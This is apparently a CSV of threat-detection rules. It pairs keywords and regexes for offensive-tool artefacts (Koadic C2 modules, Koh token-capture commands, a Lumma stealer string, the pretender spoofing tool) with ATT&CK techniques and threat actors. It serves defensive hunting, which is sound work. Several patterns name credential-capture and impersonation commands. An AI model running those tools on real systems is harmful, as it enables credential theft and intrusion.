"*Koadic.persist*",".{0,1000}Koadic\.persist.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50531"
"*koadic_load.*",".{0,1000}koadic_load\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50532"
"*koadic_net.*",".{0,1000}koadic_net\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50533"
"*koadic_process.*",".{0,1000}koadic_process\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50534"
"*koadic_types.*",".{0,1000}koadic_types\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50535"
"*koadic_util.*",".{0,1000}koadic_util\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50536"
"*KobieBoho@protonmail.com*",".{0,1000}KobieBoho\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50537"
"*koh filter add SID*",".{0,1000}koh\sfilter\sadd\sSID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50538"
"*koh filter list*",".{0,1000}koh\sfilter\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50539"
"*koh filter remove SID*",".{0,1000}koh\sfilter\sremove\sSID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50540"
"*koh filter reset*",".{0,1000}koh\sfilter\sreset.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50541"
"*koh groups LUID*",".{0,1000}koh\sgroups\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50542"
"*koh impersonate LUID*",".{0,1000}koh\simpersonate\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50543"
"*koh release all*",".{0,1000}koh\srelease\sall.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50544"
"*koh release LUID*",".{0,1000}koh\srelease\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50545"
"*Koh.exe capture*",".{0,1000}Koh\.exe\scapture.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50546"
"*Koh.exe list*",".{0,1000}Koh\.exe\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50547"
"*Koh.exe monitor*",".{0,1000}Koh\.exe\smonitor.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50548"
"*Komedx765eta\\Usedx765er Daedx765ta*",".{0,1000}Komedx765eta\\\\Usedx765er\sDaedx765ta.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","50549"
"*kontakt@redteam-pentesting.de*",".{0,1000}kontakt\@redteam\-pentesting\.de.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","50550"
